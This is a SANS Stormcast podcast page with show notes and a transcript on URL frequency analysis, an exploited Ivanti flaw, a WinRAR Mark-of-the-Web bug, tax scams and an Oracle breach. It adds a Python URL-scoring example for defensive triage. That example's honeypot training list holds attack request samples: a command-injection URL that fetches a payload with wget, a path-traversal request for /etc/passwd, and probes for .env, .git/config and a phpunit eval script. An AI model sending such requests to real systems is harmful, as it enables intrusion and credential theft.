SANS Stormcast Friday, Apr 4th: URL Frequency Analysis; Ivanti Flaw Exploited; WinRAR MotW Vuln; Tax filing scams; Oracle Breach Update
Direct link to the audio file: https://traffic.libsyn.com/securitypodcast/9394.mp3
Exploring Statistical Measures to Predict URLs as Legitimate or Intrusive
Using frequency analysis and training the model with honeypot data as well as log data from legitimate websites allows for a fairly simple and reliable triage of web server logs to identify possibly malicious activity.
https://isc.sans.edu/diary/Exploring%20Statistical%20Measures%20to%20Predict%20URLs%20as%20Legitimate%20or%20Intrusive%20%5BGuest%20Diary%5D/31822
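As an added illustration of the frequency-analysis idea (this is not code from the diary, and the diary's exact statistical measures are not given on this page), the following Python scores a URL path with a character-bigram log-likelihood ratio learned from two small constructed samples, one of legitimate paths and one of honeypot paths:

```python
from collections import Counter
import math

# Constructed training samples (not real log data): paths a normal site sees
# versus paths typically recorded only by a honeypot.
LEGIT_PATHS = [
    "/index.html", "/about/", "/blog/2025/04/post-1", "/static/css/main.css",
    "/images/logo.png", "/contact", "/blog/2025/03/another-post",
    "/static/js/app.js", "/products/widget", "/search?q=shoes",
]
HONEYPOT_PATHS = [
    "/cgi-bin/.%2e/.%2e/.%2e/bin/sh", "/shell?cd+/tmp;wget+http://203.0.113.5/x",
    "/?XDEBUG_SESSION_START=phpstorm", "/wp-login.php", "/.env",
    "/boaform/admin/formLogin?username=admin&psd=admin",
    "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php",
    "/solr/admin/info/system?wt=json", "/../../../../etc/passwd", "/.git/config",
]
def bigrams(s):
    """Character bigrams of a path, case-folded so 'Admin' and 'admin' match."""
    s = s.lower()
    return [s[i:i + 2] for i in range(len(s) - 1)]
def train(paths):
    """Bigram counts and total bigram count over one corpus."""
    counts = Counter()
    for p in paths:
        counts.update(bigrams(p))
    return counts, sum(counts.values())
def build_model(legit, bad, alpha=0.5):
    """Per-bigram log-likelihood ratio log P(g|honeypot)/P(g|legit), Laplace-smoothed."""
    lc, ln = train(legit)
    bc, bn = train(bad)
    vocab = set(lc) | set(bc)
    v = len(vocab)
    llr = {g: math.log((bc[g] + alpha) / (bn + alpha * v))
           - math.log((lc[g] + alpha) / (ln + alpha * v)) for g in vocab}
    # Bigrams absent from both corpora get the smoothed zero-count ratio.
    unseen = math.log((ln + alpha * v) / (bn + alpha * v))
    return llr, unseen
def score(path, model=None):
    """Mean per-bigram LLR; positive means the path looks more like honeypot traffic."""
    llr, unseen = model or MODEL
    grams = bigrams(path)
    if not grams:
        return 0.0
    return sum(llr.get(g, unseen) for g in grams) / len(grams)
def is_suspicious(path, model=None, threshold=0.0):
    """Triage decision: flag paths whose mean LLR exceeds the threshold."""
    return score(path, model) > threshold
MODEL = build_model(LEGIT_PATHS, HONEYPOT_PATHS)
```

With realistic corpora the threshold should be tuned on held-out logs, since the honeypot sample here is longer than the legitimate one and that size difference alone biases unseen bigrams toward the legitimate class.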
Critical Unexploitable Ivanti Vulnerability Exploited CVE-2025-22457
In February, Ivanti patched CVE-2025-22457. At the time, the vulnerability was not considered to be exploitable. Mandiant has now published a blog post disclosing that the vulnerability was exploited as early as mid-March.
https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability/
WinRAR MotW Vulnerability CVE-2025-31334
WinRAR patched a vulnerability that would not apply the “Mark of the Web” correctly if a compressed file included symlinks. This may make it easier to trick a victim into executing code downloaded from a website.
https://nvd.nist.gov/vuln/detail/CVE-2025-31334
Microsoft Warns of Tax-Related Scam
With the US personal income tax filing deadline only about a week out, Microsoft warns of the commonly deployed scams related to income tax filings that it is observing.
https://www.microsoft.com/en-us/security/blog/2025/04/03/threat-actors-leverage-tax-season-to-deploy-tax-themed-phishing-campaigns/
Oracle Breach Update
https://www.bloomberg.com/news/articles/2025-04-02/oracle-tells-clients-of-second-recent-hack-log-in-data-stolen
Podcast Transcript
Hello and welcome to the Friday, April 4th, 2025 edition of the SANS Internet Storm Center's Stormcast. My name is Johannes Ullrich and today I'm recording from Jacksonville, Florida. Today we got another diary from one of our undergraduate interns, Gregory Weber, who talks about analyzing URLs collected by honeypots and how to identify malicious traffic and distinguish it from normal traffic to a web application. Of course, honeypots, by definition, really only get malicious requests. So Gregory did compare it to data from a normal website, did some frequency analysis on it, and actually came up with a model that looks reasonably good in distinguishing attacks from non-attacks. I think it still needs a little bit of refinement and maybe more data really to validate it well, but it's an interesting approach, and there, of course, is a lot of work happening currently doing sort of some more automated log analysis, automated intrusion detection, using some of these machine learning techniques.

And the next story falls in the category, never underestimate the creativity of a sophisticated attacker. In this example, it's a critical vulnerability in Ivanti Connect Secure. It was patched in February. It's a buffer overflow, but exploitation is quite constrained for that buffer overflow. So Ivanti initially assessed that this particular vulnerability is not exploitable. Well, they were proven wrong now, apparently, by some actor that may be associated with some Chinese state actors. According to Mandiant, who wrote about it, it looks like they reversed the patch, a very common technique, of course, to figure out what the exact vulnerability was. And yes, then came up with an exploit that was applicable, even though these constraints, of course, still applied. Interesting blog post. Apparently, these attacks started in mid-March. And as of today, Ivanti also disclosed that this vulnerability has actually been exploited.

And yet another Mark of the Web vulnerability, this time in WinRAR. So like all of these decompression, unpacking style programs, well, if the original file was downloaded from the web, they have to apply this Mark of the Web to all the files that they're expanding. WinRAR usually does that, but apparently doesn't do it correctly if there are symlinks involved. And that's the vulnerability that was addressed here. Not a huge deal, I think, but certainly something that you do want to update, given that this is relatively popular software.

And well, it's already almost a week into April. With that, we are getting close to the tax filing deadline in the U.S., April 15th. Microsoft released a timely warning here that, well, they're seeing, of course, the usual number of tax-related scams. And definitely something that you do want to share with colleagues, particularly less technical colleagues, what is being done here right now. Personally, I've actually not seen a lot. I don't think any really so far this year. But the typical things are fake tax form download sites, QR codes being used to trick users into going to malicious sites. Also, be a little bit careful as to what websites you're using for tax filing services. Remember, I think it was two years ago, we found like e-file.com, for example, being compromised around tax filing season. So definitely go with name-brand websites that you have used in the past that already have your data. And so far, if they're compromised, well, your data is lost anyway. But definitely be a little bit careful here who you are using in order to file your taxes, and with that, giving them a lot of your personal information.

And talking about trust and breaches, Oracle now apparently has notified some of its customers that their login credentials may have been leaked. They say this is associated with an older system, and the data that was actually being leaked here was not current data. Now, the group that actually leaked the data has disputed that. Again, this comes back down to how much do you trust your cloud providers? Because in the end, that's what cloud is all about. You can't really verify the information that they're giving you. So you're trusting that they're giving you the right, correct information to make sound decisions with. Assume something happened here. But of course, we still don't exactly know what and what the extent is. And yes, be ready that Oracle may notify you in private, even though their public statements at this point don't really say much about this particular breach.

Well, that's it for today. If you've got a minute, please leave a good review on any of the podcast sites where you're downloading this particular podcast. And subscribe, of course, to automatically be offered any new episodes being released. Remember, we also have, like, Alexa, for example. You can get the podcast via that. We have YouTube and a bunch of other channels where we do offer this podcast. Thanks and talk to you again on Monday. Bye.